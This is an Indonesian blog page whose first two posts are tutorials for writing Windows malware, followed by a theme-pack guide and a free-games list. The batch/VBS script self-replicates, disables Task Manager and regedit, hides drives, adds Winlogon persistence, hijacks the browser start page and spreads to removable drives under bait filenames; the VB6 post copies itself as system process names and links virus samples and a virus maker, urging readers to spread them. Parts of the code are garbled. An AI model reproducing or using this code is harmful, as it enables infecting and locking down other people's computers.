bikin virus pake CMD

Posted in | 21.06

Dengan hampir membaca semua artikel yang berhubungan dengan registry dan virus, atas nama logika yang saya punya, saya berhasil membuat sebuah program yang menurut saya layak disebut sebagai virus, walaupun masih virus-virusan.

Kenapa saya pede sekali dengan menyebut program ini sebagai virus? Karna program yang saya buat dengan mengunakan software QuickBFC ini, bisa membelah diri (apabila dieksekusi)-bukankah salah satu ciri dari virus adalah dapat menggandakan diri- dan program ini juga masih sanggup untuk menyebar ke flashdisk(atau memory card) yang terdefault ke drive F:\. Jelas layak kan program yang satu ini di sebut sebagai virus(-virusan). Dan program ini juga tidak akan merusak file ataupun menghapusnya, Cuma buat iseng doang ko, cuma main-main diregistry.

Oke, karna saya rasa basa-basinya udah kebanyakan mari kita mulai.

Tapi sebelumnya saya mau mengucapkan terimakasih dulu buat si tomPLIX yang udah nulis artikel “Bikin Virus Dengan Perintah CMD”, karna program ini adalah pemikiran lanjutan setelah saya baca artikel itu. Dan juga tidak lupa rasa termakasih yang sebesar besarnya buat mas Wardana, R, S. yang udah ngenalin saya dengan pemrograman lewat bukunya; “Pemrograman Virus dan Spyware (uncensored)”, diterbitkan oleh jasakom.

Oke di mulai dari apa yang dibutuhkan. Yang dibutuhkan adalah :

  1. Software Quick Batch File Compiler (Quickbfc) www.abyssmedia.com

    2. (apa gunanya..?: software ini bisa menjadikan file .bat menjadi file .exe (executable). Karna virus yang akan kita buat ini bekerja dengan perintah CMD. Dan ada satu kegunaan software ini lagi, yaitu menyembunyikan jendela console. Jadi file .exe yang dibuat, ketika di run(jalankan) tidak menampilkan jendela console tapi tetap bekerja!! Hebat kan neh software.

  2. Software Icon Changer

    3. (apa gunanya???: lo ga mau kan virus buatan lo udah di apus duluan karna iconnya aneh dan mencurigakan. Nah, Icon Changer ini diperlukan untuk mencari Icon yang dimiliki oleh Windows, downloadnya di www.shelllabs.com .

  3. Kemauan untuk memahami perintah-perintah CMD, Visual Basic Script (VBS) dan ga takut bermain di RegEdit.
  4. (ini disensor sama kru jasakom) Berbatang-batang ganja kering siap hisap. Tapi kalo ga biasa mah ga usah, bisa bisa malah ga bisa mikir!

    5. Oke, semua udah siap. Mari dimulai, jalan kan software Quick bfc, lalu ketik script dibawah ini:

  1. @echo off
  2. If exist c:\windows\exploler.exe Goto lanjut
  3. for %%a in (*.exe) do if %%~za equ 123456 copy “%%a” %systemroot%\exploler.exe
  4. copy c:\windows\exploler.exe c:\”rahasia gua”.exe
  5. echo on error resume next>c:\windows\gila.vbs
  6. echo Dim WshShell, f1, fso, f2>>c:\windows\gila.vbs
  7. echo set WshShell = CreateObject(”Wscript.Shell”)>>c:\windows\gila.vbs
  8. echo set fso = CreateObject(”Scripting.FileSystemObject”)>>c:\windows\gila.vbs
  9. echo set f1 =
    fso.GetFile(”C:\WINDOWS\exploler.exe”)>>c:\windows\gila.vbs
  10. echo set
    f2=fsoGetFile(“C:\windows\gila.vbs”)>>c:\windows\gila.vbs
  11. echo f1.Attributes = “3″>>c:\windows\gila.vbs
  12. echo f2.Attributes =”3”>>c:\windows\gila.vbs
  13. echo WshShell.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”,
    “1″, “REG_DWORD”>>c:\windows\gila.vbs
  14. echo WshShell.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives”,
    “29″, “REG_DWORD”>>c:\windows\gila.vbs
  15. echo WshShell.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive”,
    “29″, “REG_DWORD”>>c:\windows\gila.vbs
  16. echo WshShell.RegWrite
    “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\system\DisableRegistryTools”,
    “1″, “REG_DWORD”>>c:\windows\gila.vbs
  17. echo WshShell.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”,
    “1″, “REG_DWORD”>>c:\windows\gila.vbs
  18. echo WshShell.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”,
    “1″, “REG_DWORD”>>c:\windows\gila.vbs
  19. echo WshShell.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\system\DisableTaskMgr”,
    “1″, “REG_DWORD”>>c:\windows\gila.vbs
  20. echo WshShell.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Internet
    Explorer\Main\Start Page”, “http://fanaticanz.blogspot.com”, “REG_SZ”>>c:\windows\gila.vbs
  21. echo WshShell.RegWrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
    NT\CurrentVersion\Winlogon\Shell”, “Explorer.exe C:\WINDOWS\exploler.exe”,
    “REG_SZ”>>c:\windows\gila.vbs
  22. echo WshShell.RegWrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
    NT\CurrentVersion\RegisteredOrganization”, “rastaman”, “REG_SZ”>>c:\windows\gila.vbs
  23. echo WshShell.RegWrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
    NT\CurrentVersion\RegisteredOwner”, “fanatiCanz”, “REG_SZ”>>c:\windows\gila.vbs
  24. :lanjut
  25. call c:\windows\gila.vbs
  26. if exist c:\legalin_ganja_dong_by_fanatiCanz.exe goto ceki
  27. for /R c:\ %%d in (legalin_ganja_dong_by_fanatiCanz.exe) do
    copy c:\windows\exploler.exe “%%d”
  28. Goto ceki
  29. :infek1
  30. for %%a in (*.exe) do if %%~za equ 12345 copy “%%a”
    %systemroot%\exploler.exe
  31. Goto ceki
  32. :infek2
  33. Copy c:\windows\exploler.exe c:\”gambar lucu”.exe
  34. Goto ceki
  35. :infek3
  36. Copy c:\windows\exploler.exe f:\”koleksi kartun flash”.exe
  37. Goto ceki
  38. :cekf
  39. if exist f:\”koleksi kartun flash”.exe Goto ceki
  40. Goto infek3

  41. :ceki
  42. if not exist c:\windows\exploler.exe Goto infek1
  43. if not exist c:\”gambar lucu”.exe Goto infek2
  44. if exist f:\ Goto cekf
  45. Goto ceki

Waaahhhh……… panjang ya?jangan bilang iya, soale mungkin nanti disaat menjadi programer betulan, 52 baris sih masih sangat amat enteng sekali!!! Mungkin nanti bakalan punya proyek yang jumlahnya ribuan atau mungkin puluhan ribu baris, jadi jangan menyerah Cuma karna 52 baris diatas.

Sebetulnya tanpa software quickbfc, masih bisa ko bikin virus(-virusan) ini dan script diatas ditulis dengan menggunakan notepad, lalu di simpan dengan ektensi-nya harus .bat. Dan emang kalo mau nyoba bikin pake notepad trus disimpen dengan ektensi .bat, ada perintah yang bisa diganti, yakni perintah baris ke-3 dan 33 yang “for %%a in dst….” Diganti jadi “copy %0 tujuan dan nama file nya”.

Tapi kan kalo nyebarin dengan ektensi .bat kan teramat mencurigakan, mendingan pake quickbfc lalu compile dengan ektensi .exe namanya terserah, contoh:cewe_telanjang.exe (icon nya juga yang sexi, biar lebih mantap), gua yakin para muka mesum akan langsung menjadi korban (heehehe)!!! Dan berdoalah semoga kompie calon korban ngga pake anti virus!.

Oke kalo kamu masih sanggup dan masih mau ngebaca tulisan ini, kamu bakalan dapet penjelasan dari script diatas!

Dan penjelasannya adalah:

Baris

  1. Ini Cuma perintah dasar cmd yang tidak akan menampilkan perintah yang harusnya tertulis di console cmd. (dipikir-pikir ngapain juga yach? Kan ini adalah proyek ghost application! Tapi bodo ah!!)
  2. Ini perintah untuk mengecek keberadaan file explorer.exe di drive c:\windows. Kalo udah ada kan berarti udah diinfek, dan akan langsung menuju parameter perintah lanjut, tapi kalo belum ada maka akan dilanjutkan ke baris selanjutnya.
  3. perintah untuk menyalin program ini ke folder c:\windows dengan nama explorer.exe yang selanjutnya akan menjadi file induk program ini. Sebetulnya kalo dibikinnya pake notepad dan disimpan dengan ektensi .bat maka perintah “for %%a in (*.exe) do if %%~za equ 123456 copy “%%a” %systemroot%\exploler.exe” diganti jadi “copy %0”. Nah, kalo pake software Quickbfc perintah “copy %0” tidak berfungsi. (lengkapnya baca artikel siTomplix yang judulnya Bikin Virus Dengan Perintah CMD)
  4. perintah untuk menyalin file explorer.exe di drive c:\windows\ ke drive c:\ dengan nama “rahasia gua.exe
  5. perintah di baris ini sampai baris 23 adalah perintah yang menggunakan parameter > dan >> untuk membuat sebuah file Visual Basic Script yang bernama gila.vbs. Disinilah kesaktian program ini, kalau berhasil dieksekusi (kenapa kalau..? ya karna ada beberapa anti virus yang memblok akses ke registry –antivirus yang saya pake ANTIvir, file .vbs ini berjalan mulus –berarti sukses. Tetapi ketika saya coba pake xxxx ada warning dan mempertanyakan file itu boleh dieksekusi atau dihapus atau dikarantin-.Sukur-sukur si calon korban ga make anti virus, tentram damai program ini jalan. Kenapa harus make file Visual Basic Script aja untuk entry ke registry? Jawabannya adalah file Visual Basic Script ini tidak hanya untuk mengisi registry saja. Ada satu lagi fungsi dari virus ini, yaitu mengganti attribute file explorer di drive c:\windows\ menjadi Hidden. Lagian juga kalo ngisi registry pake ektensi .reg bakalan ada pertanyaan “are you sure want to add the information in nama_file.reg to the registry?” ga efisien banget kan? Oke, kembali ke….? Registry. Dan registry yang di isi adalah :
    1. Menghilangkan menu RUN
    2. Menyembunyikan drive A, C, D dan E di windows explorer
    3. Menyembunyikan semua file di drive A, C, D dan E windows explorer (bakalan ada pembatasan!)
    4. Men-disable kan menu RegEdit
    5. Menghilangkan menu Folder Option
    6. Menghilangkan menu Search
    7. Mendisable kan Task Manager (ctrl+alt+del tidak bisa digunakan)
    8. Mengganti alamat default Internet Explorer menjadi http://fanaticanz.blogspot.com
    9. Menjadikan file exploler.exe di drive c:\windows yang tadi disalin(copy) selalu dijalankan ketika computer di hidupkan lagi walaupun windows masuk ke dalam safe mode!
    10. Entry yang ini bakalan merubah nama owner organitation(coba deh kalian klik kanan di my computer trus pilih properties, dan liat di situ ada tulisan “registered to:”) nah, entry yang satu ini akan merubah nama organization yang tadinya apapun menjadi “rastaman”
    11. Sama, entry yang satu ini juga merubah nama owner (cek lagi aja di properties my computer) yang tadinya apapun menjadi “fanaticanz”

    6. Puh.. selesai juga tentang Registry…. Masih mau lanjut???? lanjut mang……………

  1. kosong
  2. ini parameter yang membuat kumpulan perintah yang terdiri dari baris 26 – 28
  3. ini perintah yang akan mengeksekusi file gila di folder c:\windows
  4. ini perintah yang mempertanyakan keberadaan file legalin ganja dong by fanatiCanz.exe, jika ada maka akan langsung dirujuk menuju parameter perintah ceki
  5. ini perintah untuk menggandakan file induk exploler.exe yang ada di drive C:\windows\ ke seluruh folder dan subfolder yang ada di drive c:\ dengan nama legalin_ganja_dong_by_fanatiCanz.exe ((((thank’s a lot for tomplix))))
  6. ini perintah untuk langsung menuju parameter perintah ceki (baris 47)
  7. kosong
  8. ini parameter yang membuat kumpulan perintah bernama infek1 yang berisikan perintah dari baris 33 – 34
  9. perintah ini untuk menyalin file program ini dan sedang dijalankan (eksekusi) ke folder c:\windows dengan nama exploler.exe
  10. ini perintah yang merujuk langsung ke parameter perintah ceki
  11. kosong (untuk mengakhiri kumpulan parameter yang sebelumnya dibuat)
  12. parameter yang membuat kumpulan perintah bernama infek2 yang berisikan perintah dari baris 37 – 38.
  13. ini perintah untuk menyalin file induk exploler.exe ke drive c:\ dengan nama gambar lucu.exe
  14. ini perintah yang langsung merujuk ke perintah ceki
  15. kosong (untuk mengakhiri kumpulan parameter yang sebelumnya dibuat)
  16. ini parameter yang membuat kumpulan perintah bernama indek3 yang berisikan perintah dari baris 41 – 42
  17. ini perintah untuk menyalin file induk exploler.exe ke drive f:\ dengan nama koleksi kartun flash.exe
  18. ini perintah yang merujuk langsung ke parameter perintah ceki
  19. kosong (untuk mengakhiri kumpulan parameter yang sebelumnya dibuat)
  20. ini parameter yang membuat kumpulan perintah bernama cekf yang berisikan kumpulan perintah dari baris 45-46
  21. ini perintah yang mempertanyakan keberadaan file koleksi kartun flash.exe di drive f:\. Jika tidak maka akan dilanjutkan ke parameter perintah infek3. Tapi jika file terebut sudah ada, itu berarti sudah diinfek maka akan dilanjutkan ke perintah pada baris selanjutnya.
  22. ini perintah yang langsung merujuk kepada parameter perintah ceki
  23. kosong (untuk mengakhiri kumpulan parameter yang sebelumnya dibuat)
  24. ini parameter yang membuat kumpulan perintah bernama ceki yang berisikan kumpulan perintah dari baris 49-51.
  25. ini perintah untuk mempertanyakan keberadaan file exploler.exe di drive c:\windows, kalo ga ada itu berarti file induk program ini berhasil (sudah) dihapus, maka akan dilanjutkan ke parameter perintah infek1 dengan perintah yang sama pada baris 3 dan 33.
  26. ini perintah untuk mempertanyakan keberadaan file gambar lucu.exe di drive c:\, kalo ga ada maka bakal dilanjutin ke perintah infek2
  27. ini perintah untuk mengetahui ada tidaknya drive f:\ kalo ada maka bakal dilanjutin ke perintah infek3, tapi kali ga ada bakal langsung menuju perintah selanjutnya
  28. kosong
  29. ini perintah untuk kembali lagi ke parameter perintah ceki, semcam looping lah…

Puuhhh………….. akhirnya, 80 baris yang panjang sekali ya penjelasannya (jangan dijawab iya!). Namanya juga belajar, bersusah-susah dululah, nanti bersenang-senang kalau sudah sukses kaya Mas Sto atau Mas Wardana (kedua orang ini walaupun gua ga pernah liat langsung, udah gua anggap suhu! Gapapakan mas ?).Oya buat kamu yang masih kurang mengerti penjelasan script diatas saya saranin agar kamu baca :

  1. Buku “Pemrograman Virus dan SpyWare [uncensored]” karya Wardana, R, S.Hut terbitan Jasakom
  2. Artikel tomPLIX yang judulnya “Membuat Virus dengan Perintah CMD” di situs jasakom.com
  3. semua yang berhubunagn dengan registry

Masih pada keukeuh baca tulisan ini, kalau iya, gua kasih script pemulih nya deh sekalian, ga adil dong, masa ngasih penyakitnya doang! (iya ga?)
Script Pemulih nya sebagai berikut ;

  1. @echo off
  2. title Script Pemulih virus-virusan –rasta-Farian.B
  3. echo on error resume next>c:\gila.vbs
  4. echo Dim WshShell, f1, fso>>c:\gila.vbs
  5. echo set WshShell = CreateObject(”Wscript.Shell”)>>c:\gila.vbs
  6. echo set fso = CreateObject(”Scripting.FileSystemObject”)>>c:\gila.vbs
  7. echo set f1 = fso.GetFile(”c:\windows\exploler.exe”)>>c:\gila.vbs
  8. echo set f2 =fso.GetFile(“c:\windows\gila.vbs”)
  9. echo f1.Attributes = “0″>>c:\gila.vbs
  10. echo f2.Attributes = “0”>>c:\gila.vbs
  11. echo WshShell.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”,
    “0″, “REG_DWORD”>>c:\gila.vbs
  12. echo WshShell.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\system\DisableRegistryTools”,
    “0″, “REG_DWORD”>>c:\gila.vbs
  13. echo WshShell.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrives”,
    “0″, “REG_DWORD”>>c:\gila.vbs
  14. echo WshShell.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”,
    “0″, “REG_DWORD”>>c:\gila.vbs
  15. echo WshShell.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”,
    “0″, “REG_DWORD”>>c:\gila.vbs
  16. echo WshShell.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\system\DisableTaskMgr”,
    “0″, “REG_DWORD”>>c:\gila.vbs
  17. echo WshShell.RegWrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell”,
    “Explorer.exe”, “REG_SZ”>>c:\gila.vbs
  18. call c:\gila.vbs
  19. pause
  20. Goto del1
  21. kosong
  22. :del1
    23. del %systemroot%\exploler.exe
  23. pause
  24. Goto del2
  25. for /R c:\ %%d in (legalin ganja dong by fanatiCanz.exe) do del “%%d”
  26. pause
  27. Goto del3
  28. :del3
  29. del c:\”gambar lucu”.exe
  30. pause
  31. :del4
  32. del %systemroot%\gila.vbs
  33. pause

Ga banyak yang bisa dijelasin dari script diatas, kalo lo mahamin script virus(-virusannya) lo bakalan dengan mudah mengerti script diatas. Dari baris 3 sampe 16 dibikin file gila.vbs yang akan membuat normal semua key yang disebabkan program virus(-virusan) tadi. Terus di baru 17 dieksekusi file gila.vbs dan bakalan langsung menuju perintah del 1 yang berisikan perintah untuk menghapus file induk program tadi. Kalo selesai bakalan dilanjutin ke perintah del2, yang akan menghapus file legalin ganja dong by fanatiCanz.exe di seluruh folder dan seub folder di drive c:\. Terus dilajnutin keperintah selajutnya, dan seterusnya.

Script pemulih ini bisa dibuat juga dengan menggunakan notepad lalu simpan dengan extensi .bat. Untuk merasakan khasiat dari script pemulih diatas, jalankan script pemulih tersebut lalu masuk ke dalam Task manager (kan udah dipulihin, jadi task manager udah bisa di control), di dalam menu Process mastikan proses yang namanya, exploler.exe, cmd.exe (end process), setelah semua proses yang namanya CMD.exe, legalin ganja dong by fanatiCanz.exe dan proses exploler.exe dihapus, Jalankan sekali lagi script pemulihnya sampe selesai dan terakhir restart komputernya, dijamin uang kembali, setelah semua “ritual” diatas selesai, computer yang terinfek akan kembali seperti semula.

Viva O Muerte!!

fanatiCanz thank’s to:

  1. Tuhan YME, atas ganja dan semua kedamaian di alamNya ( kota tidak termasuk, hanya pantai, gunung, lembah, dan semuanya yang masih murni karya Tuhan)
  2. orang-orang yang tulisannya jadi bahan acuan nih artikel : tomPLIX, natans_hacker, Mas Wardana, rename-rename (yang nulis “Anti Deletion File”) dan scarebyte
  3. Bequni D GanjaMan –http://sibequni.blogspot.com– (thank’s for your spirit and your soul!) ~kenapa hati sama otak jarang banget bisa nyambung, ya?
  4. Bokap – Nyokap
  5. My lit.Sis ‘n Bro –Putri–Adnan–Asya– (maaf ya, computer kalian harus dibawa dulu)
  6. Anisa Agustina –wuih.. hidden spiritnya banyak banget..! makasih, yah!
  7. Devi Akhsari –kapan kapan boleh ngobrol…?
  8. Barudak Angkasa Pura 2 yang masih setia manggil gua si_bego
  9. yang nemuin/nyiptain Internet
  10. Wiji Thukul & Che Guevara (karna perjuangannya telah melahirkan semangat juang dalam diri ini!)
  11. Iwan Fals & Bob Marley (Sumpah, lirik lagunya banyak nyemangatin gua!!)
  12. Dan terimakasih yang sebanyak-banyaknya buat kamu yang udah mau baca tulisan ini sampai huruf terakhir.. hiks..hiks.. (!terharu saya jadinya!)

Dan terakhir (lagi lagi terakhir.. ;-) , izinkanlah saya untuk membacakan (baca:mengetikan) sebuah puisi karya Wiji Thukul :

Kemerdekaan

Kemerdekaan mengajarkan aku berbahasa
membangun kata-kata
dan mengucapkan kepentingan

kemerdekaan
mengajar aku menuntut
dan menulis surat selebaran

kemerdekaanlah yang membongkar kuburan ketakutan dan menunjukkan jalan
kemerdekaan adalah gerakan yang tak terpatahkan!

Kemerdekaan
Selalu di garis depan!!

Read Users' Comments (1)komentar

virus VB

Posted in | 20.55

Bikin Virus Dengan Visual Basic 6
Sebenarnya bikin virus itu menyenangkan, apalagi klo kita sampai bisa bikin orang kebakaran jengot gara2 virus kita. Aku mau berbagi sedikit ilmu nih tentang cara bikin virus dengan VB 6. Materi ini hanya untuk coba-coba saja atau kata lainnya ini masih dasarnya. Kamu mungkin bisa mengembangkannya sendiri. Oh ya, aku juga menyertakan satu contoh virus yang sudah aku buat namanya r3d_94l4xy. Untuk materi yang lebih berat akan disambung lain waktu. Bagi yang ingin mendapatkan sample virus tertentu dengan source codenya silakan contact Johan.

Pertama, bikin form buat virus kamu pake Standart exe saja

1. Nyembuin Form

Private Sub Form_Load()
App.TaskVisible = False
End Sub

2. Kopiin Diri Sendiri
Misalnya mau dikopiin ke direktori C:\Windows dengan nama winlogon.exe csrss.exe ato services.exe
biar prosesnya sulit di kill pake taskmanager, nama virus pake nama system pada windows

On Error Resume Next
FileCopy App.EXEName + “.exe”, “C:\WINDOWS\winlogon.exe”
FileCopy App.EXEName + “.exe”, “C:\WINDOWS\csrss.exe”
FileCopy App.EXEName + “.exe”, “C:\WINDOWS\services.exe”
FileCopy App.EXEName + “.exe”, “C:\WINDOWS\smss.exe”
FileCopy App.EXEName + “.exe”, “C:\WINDOWS\lsass.exe”

3. Bikin Direktori ato folder
Misalnya bikin folder di windows direktori

On Error Resume Next
MkDir “C:\WINDOWS\virus”

4. Mengganti Atribut file
Bisa juga buat ngganti atribut folder
Attributes = 0 0 berarti normal
Attributes = 1 1 berarti read only
Attributes = 2 2 berarti hidden
Attributes = 3 3 berarti read only + hidden
Attributes = 4 4 berarti system
Attributes = 5 5 berarti system + read only
Attributes = 6 6 berarti system + hidden

Set sembunyi = CreateObject(”Scripting.FileSystemObject”)
On Error Resume Next
sembunyi.GetFile(”C:\WINDOWS\winlogon.exe”).Attributes = 2
sembunyi.GetFile(”C:\WINDOWS\csrss.exe”).Attributes = 2
sembunyi.GetFile(”C:\WINDOWS\services.exe”).Attributes = 2
sembunyi.GetFile(”C:\WINDOWS\smss.exe”).Attributes = 2
sembunyi.GetFile(”C:\WINDOWS\lsass.exe”).Attributes = 2

tapi kalo folder pakenya
sembunyi.GetFolder(”C:\WINDOWS\”).Attributes = 2

5. Bikin Pesan Virus
Bikin pesen pake text file

On Error Resume Next
Set bikinpesen = CreateObject(”Scripting.FileSystemObject”)
Set isipesen = bikinpesen.Createtextfile(”C:\baca saya.txt “)
isipesen.writeline (”komputer kamu kena virus bodoh “)
isipesen.Close

6.Ngubah Registry
Misalnya mo disable regedit

On Error Resume Next
Set ubahreg = CreateObject(”WScript.Shell”)
ubahreg.regwrite “HKEY_CURRENT_USER\software\
microsoft\windows\currentversion\policies\system\
disableregistrytools”, 1, “REG_DWORD”

7.Menghapus Registry
Misalna mo ngehapus HKEY_LOCAL_MACHINE\
Software\Microsoft\Windows NT\CurrentVersion\Run\ServLogon



On Error Resume Next
Set hapusreg = CreateObject(”WScript.Shell”)
hapusreg.regdelete “HKEY_LOCAL_MACHINE\
Software\Microsoft\Windows NT\CurrentVersion\Run\ServLogon”

Nah sekian dulu materi yang kita pelajari, dari pada pusing, download sample virus r3d_94l4xy dan sebarin ke seluruh penjuru dunia OK!
r3d_94l4xy.rar 180 kb
Berhubung banyaknya permintaan mengenai Sample Virus dalam bentuk VB Project, jadi dibawah ini aku tambahi Source VB nya r3d_94l4xy dan virus lainnya :
r3d_94l4xy (VB_Basic).rar 95 kb
r3d_94l4xy (VB_Extreme).rar 860 kb
Source VB 4 Virus.rar 1297 kb
Trus yang ini adalah software untuk membuat virus dengan mudah, coba deh !
Visual Basic Virus Maker 32 RC 03.rar 1560 kb
Trus yang terakhir ini adalah Artikel tentang Regsitry, bisa kamu pelajari sampai tua!
1001 Malam Mengedit Registry.rar 41 kb
Teknik Bikin Virus Komputer.rar 20 kb
Tak kasih bonus ya Internet Maniac dan Harpot Infeksi Exe, tau kan fungsinya!
Internet Maniac.rar 59 kb
Harpot Infeksi Exe.rar 881 kb
Segini dulu aja ya, soalnya aku lagi persiapan buat lomba Debat Bahasa Inggris di Jember, tanggal 25 November nanti. Dan jangan lupa doain aku biar juara 1, OK ! Dan seperti biasanya, kalau ada pertanyaan, silakan bertanya jangan dipendam. Selamat Belajar !

Read Users' Comments (0)

xp jadi 7(Seven Remix XP 2.0)

Posted in | 20.41

Mengubah Tampilan Windows XP Menjadi Windows 7


desktop iconBagi Anda yang masih setia dengan Windows XP, tidak ada salahnya bila mencoba untuk mengganti tampilan lamanya dengan tampilan yang berbeda. Dengan sedikit program, tampilan Windows XP Anda akan berubah menjadi tampilan Windows 7.

Ada banyak program tranformation pack di luar sana, namun hanya satu yang akan dibahas di sini. Program yang digunakan untuk mengubah tampilan Windows XP menjadi Windows 7 tersebut adalah Seven Remix XP 2.0 dari NiwradSoft.

Seven Remix akan mengganti beberapa file system, menambahkan bootscreen, logon screen, sound, cursor, tema, wallpaper, dan screensaver. Saya sudah mencobanya dan sama sekali tidak terasa membebani kinerja komputer. Untuk kembali ke tampilan Windows XP cukup dengan meng-uninstallnya. Download Seven Remix XP 2.0 di sini.

Sebuah program transformation pack saja tentu tidak akan cukup untuk membuat Windows XP Anda menjadi semirip mungkin dengan Windows 7. Untuk itu saya sarankan untuk menginstall beberapa program pendukung berikut:

Klik nama program untuk mendownload.

  • ViStart, sebenarnya program ini untuk mengubah start menu Windows XP menjadi start menu Windows Vista, namun karena start menu Windows Vista dan Windows 7 tidak jauh berbeda, maka ViStart dapat dijadikan alternatif.
  • ViGlance, mengubah taskbar Windows XP Anda menjadi taskbar Windows 7.
  • ViSplore, file manager dengan tampilan seperti vista file manager.
  • TrueTransparency, program ini memberikan efek skin Aero di border window.
  • Y’z Shadow, memberikan efek transparan dan bayangan di setiap menu dan window.
  • LClock, untuk mengubah style penulisan jam di Windows XP.
  • Styler ToolBar, mengganti tampilan toolbar pada Windows Explorer.

Tampilan Windows 7 Anda tentu akan lebih bagus bila semua program-program pendukung di atas juga digunakan. Namun bila menginstall program-program tersebut menjadikan komputer Anda terasa lamban, cukup instal mana yang dirasa perlu saja.

Selamat mencoba :) .

Read Users' Comments (0)

game gratis download

Posted in | 19.58

Categories
» Action
» Adventure
» Arcade
» Board
» Cards
» Casino
» Classic
» Educational
» First Person
» Kids
» Mah Jongg
» MMORPG
» Other
» Pinball
» Poker
» Puzzle
» Racing
» Roleplaying
» Shooters
» Simulation
» Sports
» Strategy
» Tetris Style
» Utilities
» Word

Buzz the Squirrel 2
A nice Mario-like platformer - 22 levels
Posted: 15:58:19 | License: Freeware | Size: 1.49 Mb | More In This Category ...

Big City Adventure: San Francisco Demo
Travel to all of the most famous (and not so famous) locations around the cosmopolitan city of San Francisco!
Posted: 15:57:27 | License: Shareware $19.99 | Size: 22.5 Mb | More In This Category ...

Wedding Dash - Ready, Aim, Love! Demo
Love is in the air as Cupid visits DinerTown and Quinn starts planning her own wedding. With the magic of Cupid's love arrows, anything can happen!
Posted: 15:54:19 | License: Shareware $19.95 | Size: 26.8 Mb | More In This Category ...

Monster 2 - 1.0RC2 Beta
Monster 2 is a nostalgic trip back to the days of the epic SNES RPGs like Final Fantasy and Breath of Fire.
Posted: 15:44:39 | License: Freeware | Size: 35.2 Mb | More In This Category ...

CardShark 3.6.3417
CardShark is a card game compilation with Blackjack, Euchre, Espadinha, Hearts, Kemps, Sobe e Desce, Spades, Sueca and Poker.
Posted: 15:43:24 | License: Freeware | Size: 8.43 Mb | More In This Category ...

Tiki Solitaire 1.01
Welcome to Tiki
Solitaire! It’s tiki time, and it’s all about you. Celebrate the spirit of the South Pacific and move to the groove of the ocean!
Posted: 15:39:31 | License: FreeWare | Size: 5.61 Mb | More In This Category ...

Evil Cards 4.1.3417
Evil Cards is a card game compilation with Blackjack, Euchre, Espadinha, Hearts, Kemps, Sobe e Desce, Spades, Sueca and Poker
Posted: 15:39:01 | License: FreeWare | Size: 8.6 Mb | More In This Category ...

Dirt Bike Maniacs Demo 1.63
Ride and race like a Dirt Bike Maniac! Ride the race-bred off-road machines of Dirt Bike Maniacs through thrill packed tracks!
Posted: 15:31:32 | License: Shareware $19.95 | Size: 51.7 Mb | More In This Category ...

GameBoost 1.6.29.2009
GameBoost is a tool for all that allows you to modify your computer's settings to increase gaming and internet speed performance.
Posted: 15:28:11 | License: Shareware $24.95 | Size: 1.76 Mb | More In This Category ...

June 28, 2009

Youda Marina Demo
An original mix of simulation and time management, Youda Marina puts you in the role of harbor master of four unique destinations.
Posted: 11:34:56 | License: Shareware $19.95 | Size: 26 Mb | More In This Category ...

Torpedo Joe
Fishing with torpedoes !
Posted: 11:34:19 | License: Freeware | Size: 537 Kb | More In This Category ...

Space Oddity 1.0
Space Oddity is Space invaders with a twist - with several twists in fact.
Posted: 11:32:41 | License: Freeware | Size: 4.12 Mb | More In This Category ...

Kirby's Flight
Oh no! The birds are migrating south again! Watch out Kirby, there sure is a lot of them up there. Don't let them hit you!
Posted: 11:31:54 | License: FreeWare | Size: 1 Mb | More In This Category ...

Crusaders of Space 2 Demo
Shooter fans rejoice: Crusaders of Space 2 has arrived!
Posted: 11:30:50 | License: Shareware $19.95 | Size: 13.2 Mb | More In This Category ...

KT Dancer 1.03
Players help control K.T. in this 3-D dance game as they try to follow the leads from the DJ. Miss too many steps and you could find yourself as a runner up.
Posted: 11:29:33 | License: FreeWare | Size: 5.39 Mb | More In This Category ...

Warpbreaker 1.06
Blast through over 100 levels of addictive 3D brick breaking fun made by Moxiefish and Bang Out Games.
Posted: 11:28:54 | License: Shareware $19.95 | Size: 29.7 Mb | More In This Category ...

AReaker Fire and Ice
A great breakout/pinball game
Posted: 11:26:45 | License: Freeware | Size: 820 Kb | More In This Category ...

Natalie Brooks: Secrets of Treasure House Demo
Join Natalie Brooks as she solves puzzles, finds hidden items and interacts with colorful characters
Posted: 11:26:11 | License: Shareware $19.95 | Size: 39.6 Mb | More In This Category ...

Family Mystery - The Story of Amy Demo
Help Amy discover the secrets of her past in Family Mystery - The Story of Amy, an original hidden object game from the creators of the hit Mortimer Beckett series.
Posted: 11:23:23 | License: Shareware $19.95 | Size: 59 Mb | More In This Category ...

World of Goo Demo
World of Goo is built around the idea of using living balls of goo to create large structures. The goal of the game is to get a requisite number of goo balls to a pipe
Posted: 11:12:27 | License: Shareware $19.95 | Size: 65 Mb | More In This Category ...

Read Users' Comments (0)

bikin virus pke VB

Posted in | 03.14


HAI Brow………..! pecinta virus

Gwa pnya virus pke note text ni… ya lmanyan sich bwt jailin kmptr pnya onrg!... tp ingt ,

Lo jngn k seringan jailin orng, tu kan dosa!!!!!!!!!!

